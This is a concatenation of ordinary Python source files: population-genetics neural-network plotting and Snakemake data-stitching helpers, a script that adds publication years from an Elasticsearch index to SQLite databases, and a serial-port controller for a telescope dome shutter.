fig,axes = plt.subplots(2,1)
plt.subplots_adjust(hspace=0.5)
predictions = np.array([float(Y) for Y in results["predictions"]])
realValues = np.array([float(X) for X in results["Y_test"]])
const, expan = [], []
for i, val in enumerate(realValues):
if val == 0:
const.append(predictions[i])
else:
expan.append(predictions[i])
const = np.array(const)
expan = np.array(expan)
mae_0 = round(mae(realValues,predictions),4)
mse_0 = round(mse(realValues,predictions),4)
labels = "$mae = $" + str(mae_0)+" | "+"$mse = $" + str(mse_0)
n_bins = np.linspace(0.0,1.0,100)
axes[0].hist(const, n_bins, color="orange", label="Constant size", alpha=0.5)
axes[0].hist(expan, n_bins, color="blue", label="Exponential growth", alpha=0.5)
axes[0].axvline(x=0.5, linestyle="--", linewidth=0.3, color="black")
axes[0].legend(prop={'size': 4})
lossRowIndex = 1
axes[1].plot(results["loss"],label = "mae loss",color="orange")
axes[1].plot(results["val_loss"], label= "mae validation loss",color="blue")
axes[1].legend(frameon = False,fontsize = 6)
axes[1].set_ylabel("mse")
axes[0].set_ylabel("N")
axes[0].set_xlabel("sigmoid output")
fig.subplots_adjust(left=.15, bottom=.16, right=.85, top=.92,hspace = 0.5,wspace=0.4)
height = 4.00
width = 4.00
fig.set_size_inches(height, width)
fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def cross_entropy(predictions, targets, epsilon=1e-12):
predictions = np.clip(predictions, epsilon, 1. - epsilon)
N = predictions.shape[0]
ce = -np.sum(targets*np.log(predictions+1e-9))/N
return ce
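# Illustrative example with one-hot targets (numbers are made up): for targets
# [[1,0],[0,1]] and predictions [[0.9,0.1],[0.2,0.8]], the mean cross entropy is
# -(log(0.9) + log(0.8)) / 2 ≈ 0.164, i.e.
#   cross_entropy(np.array([[0.9, 0.1], [0.2, 0.8]]), np.array([[1., 0.], [0., 1.]]))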
#-------------------------------------------------------------------------------------------
def plotResultsSoftmax2(resultsFile,saveas):
plt.rc('font', family='serif', serif='Times')
plt.rc('xtick', labelsize=6)
plt.rc('ytick', labelsize=6)
plt.rc('axes', labelsize=6)
results = pickle.load(open( resultsFile , "rb" ))
fig,axes = plt.subplots(2,1)
plt.subplots_adjust(hspace=0.5)
predictions = results["predictions"]
realValues = results["Y_test"]
const, expan = [], []
for i, val in enumerate(realValues):
if val[0] == 1.0:
const.append(1.0 - predictions[i][0])
else:
expan.append(predictions[i][1])
const = np.array(const)
expan = np.array(expan)
ce = round(cross_entropy(predictions,realValues),4)
labels = "Cross entropy = " + str(ce)
n_bins = np.linspace(0.0,1.0,100)
axes[0].hist(const, n_bins, color="orange", label="Constant size", alpha=0.5)
axes[0].hist(expan, n_bins, color="blue", label="Exponential growth", alpha=0.5)
axes[0].axvline(x=0.5, linestyle="--", linewidth=0.4, color="black")
axes[0].legend(prop={'size': 4})
axes[0].set_title(results["name"]+"\n"+labels,fontsize=6)
lossRowIndex = 1
axes[1].plot(results["loss"],label = "CE loss",color="orange")
axes[1].plot(results["val_loss"], label= "CE validation loss",color="blue")
axes[1].legend(frameon = False,fontsize = 6)
axes[1].set_ylabel("Cross entropy")
axes[0].set_ylabel("N")
axes[0].set_xlabel("Predicted probability of exponential growth")
fig.subplots_adjust(left=.15, bottom=.16, right=.85, top=.92,hspace = 0.5,wspace=0.4)
height = 4.00
width = 4.00
fig.set_size_inches(height, width)
fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def plotResultsSoftmax2Heatmap(resultsFile,saveas,admixture):
plt.rc('font', family='serif', serif='Times')
plt.rc('xtick', labelsize=6)
plt.rc('ytick', labelsize=6)
plt.rc('axes', labelsize=6)
results = pickle.load(open( resultsFile , "rb" ))
fig,axes = plt.subplots(2,1)
plt.subplots_adjust(hspace=0.5)
predictions = results["predictions"]
realValues = results["Y_test"]
const, expan = [], []
const_const, const_expan, expan_const, expan_expan = 0,0,0,0
const_total, expan_total = 0,0
for i, val in enumerate(realValues):
if val[0] == 1.0:
const_total+=1
const.append(1.0 - predictions[i][0])
if predictions[i][0] > 0.5:
const_const+=1
if predictions[i][1] > 0.5:
const_expan+=1
else:
expan_total+=1
expan.append(predictions[i][1])
if predictions[i][0] > 0.5:
expan_const+=1
if predictions[i][1] > 0.5:
expan_expan+=1
const = np.array(const)
expan = np.array(expan)
ce = round(cross_entropy(predictions,realValues),4)
labels = "Cross entropy = " + str(ce)
data=np.array([[const_const/float(const_total),const_expan/float(const_total)],[expan_const/float(expan_total),expan_expan/float(expan_total)]])
if admixture:
rowLabels = ["No admixture", "Admixture"]
else:
rowLabels = ["Constant", "Growth"]
heatmap = axes[0].pcolor(data, cmap=plt.cm.Blues, vmin=0.0, vmax=1.0)
cbar = plt.colorbar(heatmap, cmap=plt.cm.Blues, ax=axes[0])
cbar.set_label('Proportion assigned to class', rotation=270, labelpad=20)
# put the major ticks at the middle of each cell
axes[0].set_xticks(np.arange(data.shape[1]) + 0.5, minor=False)
axes[0].set_yticks(np.arange(data.shape[0]) + 0.5, minor=False)
axes[0].invert_yaxis()
axes[0].xaxis.tick_top()
plt.tick_params(axis='y', which='both', right=False)
plt.tick_params(axis='x', which='both', direction='out')
if admixture:
axes[0].set_xticklabels(["No admixture", "Admixture"], minor=False, fontsize=6)
else:
axes[0].set_xticklabels(["Constant", "Growth"], minor=False, fontsize=6)
axes[0].set_yticklabels(rowLabels, minor=False, fontsize=6)
for y in range(data.shape[0]):
for x in range(data.shape[1]):
val = data[y, x]
val *= 100
if val > 50:
c = '0.9'
else:
c = 'black'
axes[0].text(x + 0.5, y + 0.5, '%.1f%%' % val, horizontalalignment='center', verticalalignment='center', color=c, fontsize=6)
axes[0].set_title(results["name"]+"\n"+labels,fontsize=6)
lossRowIndex = 1
axes[1].plot(results["loss"],label = "CE loss",color="orange")
axes[1].plot(results["val_loss"], label= "CE validation loss",color="blue")
axes[1].legend(frameon = False,fontsize = 6)
axes[1].set_ylabel("Cross entropy")
fig.subplots_adjust(left=.15, bottom=.15, right=.85, top=0.87, hspace = 0.5, wspace=0.4)
height = 4.00
width = 4.00
fig.set_size_inches(height, width)
fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def plotResultsSoftmax2HeatmapMis(resultsFile, resultsFile2, saveas, admixture):
plt.rc('font', family='serif', serif='Times')
plt.rc('xtick', labelsize=6)
plt.rc('ytick', labelsize=6)
plt.rc('axes', labelsize=6)
results = pickle.load(open( resultsFile , "rb" ))
fig,axes = plt.subplots(2,1)
plt.subplots_adjust(hspace=0.5)
predictions = results["predictions"]
realValues = results["Y_test"]
const, expan = [], []
const_const, const_expan, expan_const, expan_expan = 0,0,0,0
const_total, expan_total = 0,0
for i, val in enumerate(realValues):
if val[0] == 1.0:
const_total+=1
const.append(1.0 - predictions[i][0])
if predictions[i][0] > 0.5:
const_const+=1
if predictions[i][1] > 0.5:
const_expan+=1
else:
expan_total+=1
expan.append(predictions[i][1])
if predictions[i][0] > 0.5:
expan_const+=1
if predictions[i][1] > 0.5:
expan_expan+=1
const = np.array(const)
expan = np.array(expan)
ce = round(cross_entropy(predictions,realValues),4)
labels = "Cross entropy = " + str(ce)
data=np.array([[const_const/float(const_total),const_expan/float(const_total)],[expan_const/float(expan_total),expan_expan/float(expan_total)]])
if admixture:
rowLabels = ["No admixture", "Admixture"]
else:
rowLabels = ["Constant", "Growth"]
heatmap = axes[0].pcolor(data, cmap=plt.cm.Blues, vmin=0.0, vmax=1.0)
cbar = plt.colorbar(heatmap, cmap=plt.cm.Blues, ax=axes[0])
cbar.set_label('Proportion assigned to class', rotation=270, labelpad=20)
# put the major ticks at the middle of each cell
axes[0].set_xticks(np.arange(data.shape[1]) + 0.5, minor=False)
axes[0].set_yticks(np.arange(data.shape[0]) + 0.5, minor=False)
axes[0].invert_yaxis()
axes[0].xaxis.tick_top()
plt.tick_params(axis='y', which='both', right=False)
plt.tick_params(axis='x', which='both', direction='out')
if admixture:
axes[0].set_xticklabels(["No admixture", "Admixture"], minor=False, fontsize=6)
else:
axes[0].set_xticklabels(["Constant", "Growth"], minor=False, fontsize=6)
axes[0].set_yticklabels(rowLabels, minor=False, fontsize=6)
for y in range(data.shape[0]):
for x in range(data.shape[1]):
val = data[y, x]
val *= 100
if val > 50:
c = '0.9'
else:
c = 'black'
axes[0].text(x + 0.5, y + 0.5, '%.1f%%' % val, horizontalalignment='center', verticalalignment='center', color=c, fontsize=6)
axes[0].set_title(results["name"]+"\n"+labels,fontsize=6)
results = pickle.load(open(resultsFile2 , "rb"))
predictions = results["predictions"]
realValues = results["Y_test"]
const, expan = [], []
const_const, const_expan, expan_const, expan_expan = 0,0,0,0
const_total, expan_total = 0,0
for i, val in enumerate(realValues):
if val[0] == 1.0:
const_total+=1
const.append(1.0 - predictions[i][0])
if predictions[i][0] > 0.5:
const_const+=1
if predictions[i][1] > 0.5:
const_expan+=1
else:
expan_total+=1
expan.append(predictions[i][1])
if predictions[i][0] > 0.5:
expan_const+=1
if predictions[i][1] > 0.5:
expan_expan+=1
const = np.array(const)
expan = np.array(expan)
ce = round(cross_entropy(predictions,realValues),4)
labels = "Cross entropy = " + str(ce)
data=np.array([[const_const/float(const_total),const_expan/float(const_total)],[expan_const/float(expan_total),expan_expan/float(expan_total)]])
if admixture:
rowLabels = ["No admixture", "Admixture"]
else:
rowLabels = ["Constant", "Growth"]
heatmap = axes[1].pcolor(data, cmap=plt.cm.Blues, vmin=0.0, vmax=1.0)
cbar = plt.colorbar(heatmap, cmap=plt.cm.Blues, ax=axes[1])
cbar.set_label('Proportion assigned to class', rotation=270, labelpad=20)
# put the major ticks at the middle of each cell
axes[1].set_xticks(np.arange(data.shape[1]) + 0.5, minor=False)
axes[1].set_yticks(np.arange(data.shape[0]) + 0.5, minor=False)
axes[1].invert_yaxis()
axes[1].xaxis.tick_top()
plt.tick_params(axis='y', which='both', right=False)
plt.tick_params(axis='x', which='both', direction='out')
if admixture:
axes[1].set_xticklabels(["No admixture", "Admixture"], minor=False, fontsize=6)
else:
axes[1].set_xticklabels(["Constant", "Growth"], minor=False, fontsize=6)
axes[1].set_yticklabels(rowLabels, minor=False, fontsize=6)
for y in range(data.shape[0]):
for x in range(data.shape[1]):
val = data[y, x]
val *= 100
if val > 50:
c = '0.9'
else:
c = 'black'
axes[1].text(x + 0.5, y + 0.5, '%.1f%%' % val, horizontalalignment='center', verticalalignment='center', color=c, fontsize=6)
axes[1].set_title(results["name"]+"\n"+labels,fontsize=6)
fig.subplots_adjust(left=.15, bottom=.05, right=.85, top=0.87, hspace = 0.6, wspace=0.4)
height = 4.00
width = 4.00
fig.set_size_inches(height, width)
fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def plotSummaryStats(projectDir_A, projectDir_B, saveas):
## Load all test results
test_info_A = pickle.load(open(os.path.join(projectDir_A, "test", "info.p"), "rb"))
test_info_B = pickle.load(open(os.path.join(projectDir_B, "test", "info.p"), "rb"))
G_A_org, G_A_adv, G_B_org = [],[],[]
for i in range(test_info_A["numReps"]):
Hfilepath = os.path.join(projectDir_A, "test_images", "examp%s_org.npy" %(i))
H = np.load(Hfilepath)
G_A_org.append(H[0])
Hfilepath = os.path.join(projectDir_A, "test_images", "examp%s_adv.npy" %(i))
H = np.load(Hfilepath)
G_A_adv.append(H[0])
Hfilepath = os.path.join(projectDir_B, "test_images", "examp%s_org.npy" %(i))
H = np.load(Hfilepath)
G_B_org.append(H[0])
G_A_org = np.array(G_A_org,dtype="int8")
G_A_adv = np.array(G_A_adv,dtype="int8")
G_B_org = np.array(G_B_org,dtype="int8")
## Calculate stats for projectDir_A original examples
A_org_ng_D, A_org_gr_D = [], []
for i, gm in enumerate(G_A_org):
haps = allel.HaplotypeArray(gm)
gens = allel.GenotypeArray(haps.to_genotypes(ploidy=2))
ac = gens.count_alleles()
D = allel.tajima_d(ac)
if test_info_A["gr"][i] > 0.0:
A_org_gr_D.append(D)
else:
A_org_ng_D.append(D)
print("A_org_ng_D:", np.average(np.array(A_org_ng_D)))
print("A_org_gr_D:", np.average(np.array(A_org_gr_D)))
print("=============================================")
print("=============================================")
## Calculate stats for projectDir_A adversarial examples
A_adv_ng_D, A_adv_gr_D = [], []
for i, gm in enumerate(G_A_adv):
haps = allel.HaplotypeArray(gm)
gens = allel.GenotypeArray(haps.to_genotypes(ploidy=2))
ac = gens.count_alleles()
D = allel.tajima_d(ac)
if test_info_A["gr"][i] > 0.0:
A_adv_gr_D.append(D)
else:
A_adv_ng_D.append(D)
print("A_adv_ng_D:", np.average(np.array(A_adv_ng_D)))
print("A_adv_gr_D:", np.average(np.array(A_adv_gr_D)))
print("=============================================")
print("=============================================")
## Calculate stats for projectDir_B original examples
B_org_ng_D, B_org_gr_D = [], []
for i, gm in enumerate(G_B_org):
haps = allel.HaplotypeArray(gm)
gens = allel.GenotypeArray(haps.to_genotypes(ploidy=2))
ac = gens.count_alleles()
D = allel.tajima_d(ac)
if test_info_B["gr"][i] > 0.0:
B_org_gr_D.append(D)
else:
B_org_ng_D.append(D)
print("B_org_ng_D:", np.average(np.array(B_org_ng_D)))
print("B_org_gr_D:", np.average(np.array(B_org_gr_D)))
print("=============================================")
print("=============================================")
# (Plotting of these summary statistics is left unimplemented here; only the averages above are printed.)
#-------------------------------------------------------------------------------------------
def getMeanSDMax(trainDir):
'''
get the mean and standard deviation of rho from training set
str -> float,float,int
'''
info = pickle.load(open(trainDir+"/info.p","rb"))
rho = info["rho"]
segSites = info["segSites"]
tar_mean = np.mean(rho,axis=0)
tar_sd = np.std(rho,axis=0)
return tar_mean,tar_sd,max(segSites)
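# Usage sketch (directory path is hypothetical):
#   tar_mean, tar_sd, max_sites = getMeanSDMax("project/train")
#   # tar_mean/tar_sd can then be used to z-score targets and to unNormalize() predictions.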
#-------------------------------------------------------------------------------------------
def unNormalize(mean,sd,data):
'''
Undo z-score normalization to recover real-valued predictions
float,float,float[] -> float[]
'''
data *= sd
data += mean ##comment this line out for GRU_TUNED84_RELU
return data
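# Example (illustrative numbers): with mean = 2.5 and sd = 0.5, a z-scored prediction of
# 1.2 maps back to 2.5 + 0.5 * 1.2 = 3.1:
#   unNormalize(2.5, 0.5, np.array([1.2]))  # -> array([3.1])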
#-------------------------------------------------------------------------------------------
def plotParametricBootstrap(results,saveas):
'''
Use the output of a parametric bootstrap (the "results" pickle)
as input and plot the results of that bootstrap
'''
stats = pickle.load(open(results,'rb'))
x = stats["rho"]
fig, ax = plt.subplots()
for i,s in enumerate(stats):
if(i == 0):
continue
ax.plot(x,stats[s])
lims = [
np.min([ax.get_xlim(), ax.get_ylim()]), # min of both axes
np.max([ax.get_xlim(), ax.get_ylim()]), # max of both axes
]
ax.set_xlim(lims)
ax.set_ylim(lims)
ax.plot(lims, lims, 'k-', alpha=0.75, zorder=0)
fig.savefig(saveas)
return None
#-------------------------------------------------------------------------------------------
def snakemake_stitch_info(projectDir, seed=None, reps=None):
'''
combine the info files
created using snakemake into a directory structure
that looks as if it was created using the standard
iai-simulate pipeline
'''
## Make directories if they do not exist
trainDir = os.path.join(projectDir,"train")
valiDir = os.path.join(projectDir,"vali")
testDir = os.path.join(projectDir,"test")
networkDir = os.path.join(projectDir,"networks")
## Might need to add some info keys if using grid params?
info_keys = ["rho","mu","m","segSites","seed","gr","ne"]
## Combine the `info.p` files
minSegSites = float("inf")
for i,new_dir in enumerate([trainDir,valiDir,testDir]):
if not os.path.exists(new_dir):
os.makedirs(new_dir)
new_info_file = {}
for j in range(reps):
trainRep = os.path.join(projectDir,"rep{}".format(j+1),"train")
valiRep = os.path.join(projectDir,"rep{}".format(j+1),"vali")
testRep = os.path.join(projectDir,"rep{}".format(j+1),"test")
networkRep = os.path.join(projectDir,"rep{}".format(j+1),"networks")
rep_dirs = [trainRep,valiRep,testRep]
info_file = pickle.load(open(os.path.join(rep_dirs[i],"info.p"),"rb"))
try:
new_info_file["numReps"] += info_file["numReps"]
for key in info_keys:
new_array = np.concatenate((new_info_file[key], info_file[key]), axis=None)
new_info_file[key] = new_array
except KeyError:
new_info_file = info_file
S_min = min(new_info_file["segSites"])
minSegSites = min(minSegSites, S_min)
pickle.dump(new_info_file, open(os.path.join(new_dir, "info.p"), "wb"))
## Add the `simPars.p` file
if not os.path.exists(networkDir):
os.makedirs(networkDir)
simPars = pickle.load(open(os.path.join(networkRep,"simPars.p"),"rb"))
simPars["seed"] = seed
if os.path.basename(projectDir):
simPars["bn"] = os.path.basename(projectDir)
else:
simPars["bn"] = projectDir.split("/")[-2]
simPars["minSegSites"] = minSegSites
pickle.dump(simPars, open(os.path.join(networkDir,"simPars.p"),"wb"))
return None
#-------------------------------------------------------------------------------------------
def snakemake_stitch_sims(projectDir, rep_dir, idx, nTrain, nVali, nTest, trim=False):
'''
combine the simulation files
created using snakemake into a directory structure
that looks as if it was created using the standard
iai-simulate pipeline
'''
## Move and rename the simulation files
trainDir = os.path.join(projectDir,"train")
valiDir = os.path.join(projectDir,"vali")
testDir = os.path.join(projectDir,"test")
networkDir = os.path.join(projectDir,"networks")
minSegSites = pickle.load(open(os.path.join(networkDir,"simPars.p"),"rb"))["minSegSites"]
sims_per_rep = [nTrain, nVali, nTest]
for i,new_dir in enumerate([trainDir,valiDir,testDir]):
if trim:
print("\nTrimming genotype and position .npy files in %s to %s SNPs"%(new_dir,minSegSites))
new_index = (int(idx)-1) * sims_per_rep[i]
trainRep = os.path.join(rep_dir,"train")
valiRep = os.path.join(rep_dir,"vali")
testRep = os.path.join(rep_dir,"test")
rep_dirs = [trainRep,valiRep,testRep]
for j in range(sims_per_rep[i]):
H_orig_file = os.path.join(rep_dirs[i], "{}_haps.npy".format(j))
P_orig_file = os.path.join(rep_dirs[i], "{}_pos.npy".format(j))
H_new_file = os.path.join(new_dir, "{}_haps.npy".format(new_index))
P_new_file = os.path.join(new_dir, "{}_pos.npy".format(new_index))
H = np.load(H_orig_file)
P = np.load(P_orig_file)
if trim:
H = H[:minSegSites]
P = P[:minSegSites]
np.save(H_new_file,H)
np.save(P_new_file,P)
new_index += 1
done_file = os.path.join(rep_dir,"done.txt")
with open(done_file, "w") as fIN:
fIN.write("done")
# for storage efficiency, remove files only after trim is complete
for i,new_dir in enumerate([trainDir,valiDir,testDir]):
trainRep = os.path.join(rep_dir,"train")
valiRep = os.path.join(rep_dir,"vali")
testRep = os.path.join(rep_dir,"test")
rep_dirs = [trainRep,valiRep,testRep]
for j in range(sims_per_rep[i]):
H_orig_file = os.path.join(rep_dirs[i], "{}_haps.npy".format(j))
P_orig_file = os.path.join(rep_dirs[i], "{}_pos.npy".format(j))
os.remove(H_orig_file)
os.remove(P_orig_file)
return None
#-------------------------------------------------------------------------------------------
def snakemake_remove_rep_dirs(projectDir, reps):
'''
remove all the replicate directory structure
'''
for j in range(reps):
rep_dir = os.path.join(projectDir,"rep{}".format(j+1))
shutil.rmtree(rep_dir)
done_file = os.path.join(projectDir,"done.txt")
with open(done_file, "w") as fIN:
fIN.write("done")
print("Snakefile done")
return None
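# Usage sketch (paths and counts are hypothetical): after the Snakemake replicates finish,
# the three helpers above would typically be called in order, e.g.
#   snakemake_stitch_info("project", seed=12345, reps=10)
#   snakemake_stitch_sims("project", "project/rep1", idx=1, nTrain=100, nVali=10, nTest=10)
#   snakemake_remove_rep_dirs("project", reps=10)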
#-------------------------------------------------------------------------------------------
def worker_downsample(task_q, result_q, params):
while True:
try:
mpID, nth_job = task_q.get()
subsample_indices, minSites, from_dir, to_dir = params
for i in mpID:
for extension in ["_haps.npy","_pos.npy"]:
orig_file = os.path.join(from_dir, "{}{}".format(subsample_indices[i],extension))
new_file = os.path.join(to_dir, "{}{}".format(i,extension))
H = np.load(orig_file)
H = H[:minSites]
np.save(new_file,H)
finally:
task_q.task_done()
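# Sketch of how this worker might be driven (the queue setup is an assumption and is not
# part of this file): each task is a (list_of_indices, job_number) tuple and `params`
# bundles the shared arguments.
#   import multiprocessing as mp
#   task_q, result_q = mp.JoinableQueue(), mp.Queue()
#   params = (subsample_indices, minSites, from_dir, to_dir)
#   mp.Process(target=worker_downsample, args=(task_q, result_q, params), daemon=True).start()
#   task_q.put(([0, 1, 2], 0))
#   task_q.join()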
|
add_pub_year.py
|
#########################################################################################################################################
# IMPORTS ###############################################################################################################################
from elasticsearch import Elasticsearch as ES
import sqlite3
import re
import sys
import time
from collections import Counter
import multiprocessing as MP
from copy import deepcopy as copy
#########################################################################################################################################
# GLOBAL OBJECTS ########################################################################################################################
mapping = sys.argv[1];
DBs_in = 'representations/'+mapping+'/representations/'+'bielefeld'+'/';
DBs_out = 'representations/'+mapping+'/representations/'+'bielefeld_year'+'/';
gate = 'svkowos.gesis.intra';
addr_index = 'wos';
addr_body = { "query": {"term":{"_id": None}}, "_source":["pub_info"] };
_workers_ = 16;
_scrollsize_ = 100;
#########################################################################################################################################
# FUNCTIONS #############################################################################################################################
def get_year(wos_id,client):
body = copy(addr_body);
body['query']['term']['_id'] = wos_id;
result = client.search(index=addr_index,body=body);
years = [doc['_source']['pub_info']['pubyear'] if 'pub_info' in doc['_source'] and 'pubyear' in doc['_source']['pub_info'] else None for doc in result['hits']['hits']];
if len(years) != 1:
print('WARNING: There are',len(years),'results for',wos_id,'. Skipping...');
return None;
return years[0];
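# Usage sketch (the WOS id below is a made-up placeholder):
#   client = ES([gate], scheme='http', port=9200, timeout=60)
#   year = get_year('WOS:000000000000000', client)  # the record's pubyear, or None if not found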
#########################################################################################################################################
# PREPARING #############################################################################################################################
_cons_in_ = [sqlite3.connect(DBs_in+str(x)+'.db') for x in range(_workers_)];
_curs_in_ = [con_in.cursor() for con_in in _cons_in_];
_cons_out_ = [sqlite3.connect(DBs_out+str(x)+'.db') for x in range(_workers_)];
_curs_out_ = [con_out.cursor() for con_out in _cons_out_];
for cur_out in _curs_out_:
cur_out.execute("DROP TABLE IF EXISTS representations");
cur_out.execute("CREATE TABLE representations(mentionID TEXT, wos_id TEXT, id INT, string TEXT, c1 TEXT, t1 TEXT, c2 TEXT, t2 TEXT, c3 TEXT, t3 TEXT, c4 TEXT, t4 TEXT, street TEXT, number TEXT, postcode TEXT, city TEXT, country TEXT, concomp INT)");
_clients = [ES([gate],scheme='http',port=9200,timeout=60) for x in range(_workers_)];
#########################################################################################################################################
# LOADING ADDRESSES #####################################################################################################################
def work(cur_out,con_out,cur_in,client):
cur_in.execute("SELECT * FROM representations");
while True:
rows = cur_in.fetchmany(_scrollsize_);
if len(rows) == 0:
break;
rows_new = [];
for mentionID, wos_id, bfd_id, string, c1, t1, c2, t2, c3, t3, c4, t4, street, number, postcode, city, country, concomp in rows:
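# NOTE: the publication year retrieved below is stored in the 'number' column of the
# output row; the output schema above has no dedicated year column.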
number = get_year(wos_id,client);
rows_new.append((mentionID,wos_id,bfd_id,string,c1,t1,c2,t2,c3,t3,c4,t4,street,number,postcode,city,country,concomp,));
cur_out.executemany("INSERT INTO representations VALUES("+','.join(['?' for x in range(18)])+")",rows_new);
con_out.commit();
def main():
workers = [MP.Process(target=work, args=(_curs_out_[x],_cons_out_[x],_curs_in_[x],_clients[x],)) for x in range(_workers_)];
for worker in workers: worker.start();
for worker in workers: worker.join();
print('Done with adding additional information.');
try:
main()
except KeyboardInterrupt:
print('Interrupted.');
#########################################################################################################################################
|
musca.py
|
import time
from contextlib import suppress
from threading import Thread, Lock
from astropy import units as u
from panoptes.utils import error
from panoptes.utils.time import CountdownTimer
from panoptes.utils.utils import get_quantity_value
from panoptes.pocs.dome.abstract_serial_dome import AbstractSerialDome
class Protocol:
# device names
SHUTTER = 'Shutter'
DOOR = 'Door'
BATTERY = 'Battery'
SOLAR_ARRAY = 'Solar_A'
SWITCH = 'Switch'
# Valid thing to query about status
VALID_DEVICE = (SHUTTER, DOOR, BATTERY, SOLAR_ARRAY, SWITCH)
# Commands to write/send to shutter
OPEN_DOME = 'Shutter_open'
CLOSE_DOME = 'Shutter_close'
KEEP_DOME_OPEN = 'Keep_dome_open'
GET_STATUS = 'Status_update'
GET_PARAMETER = 'Get_parameters'
# Status codes produced by Shutter
CLOSED = 'Closed'
OPEN = 'Open'
OPENING = 'Opening'
CLOSING = 'Closing'
PARTIALLY_OPEN = 'PartOpen'
ILLEGAL = 'Illegal'
# Status codes produced by the dome when not responding to a movement cmd.
STABLE_STATES = (CLOSED, OPEN, PARTIALLY_OPEN)
# Status codes produced by Door
DOOR_OPEN = 'Open'
DOOR_CLOSED = 'Closed'
# Types for status values
STATUS_TYPES = {'Battery': float,
"Solar_A": float}
class HuntsmanDome(AbstractSerialDome):
"""Class for musca serial shutter control plus sending updated commands to TSX.
Musca Port setting: 9600/8/N/1
The default behaviour of the Musca is to asynchronously send status updates when something
(e.g. battery voltage) changes. A full status update can be requested by sending the appropriate
command to the musca. However, it appears that musca will not send status updates while the
shutter is moving, but sends a full status update after it stops moving.
"""
LISTEN_TIMEOUT = 3 # Max number of seconds to wait for a response.
MOVE_LISTEN_TIMEOUT = 0.1 # When moving, how long to wait for feedback.
NUM_CLOSE_FEEDBACKS = 2 # Number of target_feedback bytes needed.
# Seconds; a status_update is requested every minute to monitor connectivity.
STATUS_UPDATE_FREQUENCY = 60.
# Volts; do not open the shutter below this voltage, and close immediately if the voltage drops below it.
MIN_OPERATING_VOLTAGE = 12.
def __init__(self, command_delay=1, max_status_attempts=10, shutter_timeout=100, sleep=60,
*args, **kwargs):
"""
Args:
command_delay (float, optional): Wait this long in seconds before allowing next command
due to slow musca CPU. Default 1s.
max_status_attempts (int, optional): If status fails, retry this many times before
raising a PanError. Default: 10.
shutter_timeout (u.Quantity, optional): The dome shutter movement timeout. Default 100s.
sleep (u.Quantity, optional): Time to sleep between dome loop iterations.
Default is 1 min.
"""
super().__init__(*args, **kwargs)
self._command_lock = Lock() # Use a lock to make class thread-safe
self.serial.ser.timeout = HuntsmanDome.LISTEN_TIMEOUT
self._command_delay = get_quantity_value(command_delay, u.second)
self._shutter_timeout = get_quantity_value(shutter_timeout, u.second)
self._max_status_attempts = int(max_status_attempts)
self._sleep = get_quantity_value(sleep, u.second)
self._status = {}
self._status_updated = {d: False for d in Protocol.VALID_DEVICE}
self._keep_open = None
self._stop_dome_thread = False
self._stop_status_thread = False
self._status_thread = Thread(target=self._async_status_loop)
self._dome_thread = Thread(target=self._async_dome_loop)
# Start the status thread running and wait until we have a complete status reading
self._status_thread.start()
self._wait_for_status()
# Start the main dome control loop
self._dome_thread.start()
def __del__(self):
self._stop_dome_thread = True
self.close()
self._dome_thread.join()
self._stop_status_thread = True
self._status_thread.join()
@property
def is_open(self):
v = self.status[Protocol.SHUTTER]
return v == Protocol.OPEN
@property
def is_closed(self):
v = self.status[Protocol.SHUTTER]
return v == Protocol.CLOSED
@property
def door_open(self):
v = self.status[Protocol.DOOR]
return v == Protocol.DOOR_OPEN
@property
def door_closed(self):
v = self.status[Protocol.DOOR]
return v == Protocol.DOOR_CLOSED
@property
def is_safe_to_open(self):
v = self.status[Protocol.BATTERY]
if v < self.MIN_OPERATING_VOLTAGE:
self.logger.debug(f'Dome shutter battery voltage too low to open: {v!r}')
return False
return True
@property
def status(self):
"""A dictionary containing all status info for dome. """
return self._status
def open(self):
"""Open the shutter using musca.
Returns:
bool: True if the shutter is already open; otherwise None once opening has completed.
Raises:
error.PanError: If it is not safe to open or the shutter fails to open.
"""
if self.is_open:
return True
if not self.is_safe_to_open:
raise error.PanError("Tried to open the dome shutter while not safe.")
self.logger.info("Opening dome shutter.")
self._write_musca(Protocol.OPEN_DOME)
# Wait for the shutter to actually open
self._wait_for_true("is_open")
if not self.is_open:
raise error.PanError("Attempted to open the dome shutter but got wrong status:"
f" {self.status[Protocol.SHUTTER]}")
self._keep_open = True
def close(self):
"""Close the shutter using musca.
Returns:
bool: True if the shutter is already closed; otherwise None once closing has completed.
Raises:
error.PanError: If the shutter fails to close.
"""
self._keep_open = False
if self.is_closed:
return True
self.logger.info("Closing dome shutter.")
self._write_musca(Protocol.CLOSE_DOME)
# Wait for the shutter to actually close
self._wait_for_true("is_closed")
if not self.is_closed:
raise error.PanError("Attempted to close the dome shutter but got wrong status:"
f" {self.status[Protocol.SHUTTER]}")
# Private Methods
def _async_dome_loop(self):
""" Repeatedly check status and keep dome open if necessary. """
self.logger.debug("Starting dome loop.")
while True:
# Check if the thread should terminate
if self._stop_dome_thread:
self.logger.debug("Stopping dome loop.")
return
# Log the dome status
self.logger.debug(f"Dome status: {self.status}.")
# If thread has just started, maintain current dome state
if self._keep_open is None:
if self.is_open:
self.logger.info("Dome shutter is already open, keeping it that way for now.")
self._keep_open = True
else:
self._keep_open = False
# Check if we need to keep the dome open
if self._keep_open:
self.logger.debug("Keeping dome open.")
self._write_musca(Protocol.KEEP_DOME_OPEN)
time.sleep(self._sleep)
def _async_status_loop(self):
""" Continually read status updates from Musca. """
# Tell musca to send the full status
self._write_musca(Protocol.GET_STATUS)
self.logger.debug("Starting status loop.")
while True:
# Check if the thread should terminate
if self._stop_status_thread:
self.logger.debug("Stopping status loop.")
return
self._status["dome_loop_running"] = self._dome_thread.is_alive()
self._status["status_loop_running"] = self._status_thread.is_alive()
self._status["keep_shutter_open"] = self._keep_open
raw_response = self.serial.read(retry_limit=1, retry_delay=0.1)
if not raw_response:
continue
response = [s.strip() for s in raw_response.split(":")]
if len(response) != 2:
continue
key, value = response
with suppress(KeyError):
value = Protocol.STATUS_TYPES[key](value)
if key in Protocol.VALID_DEVICE:
self._status[key] = value
self._status_updated[key] = True
def _write_musca(self, cmd):
"""Wait for the command lock then write command to serial bluetooth device musca."""
with self._command_lock:
self.serial.reset_input_buffer()
self.serial.write(f'{cmd}\n')
time.sleep(self._command_delay)
def _wait_for_status(self, timeout=60, sleep=0.1):
""" Wait for a complete status.
Args:
timeout (float, optional): The timeout in seconds. Default 60.
sleep (float, optional): Time to sleep between checks in seconds. Default 0.1.
"""
timer = CountdownTimer(duration=timeout)
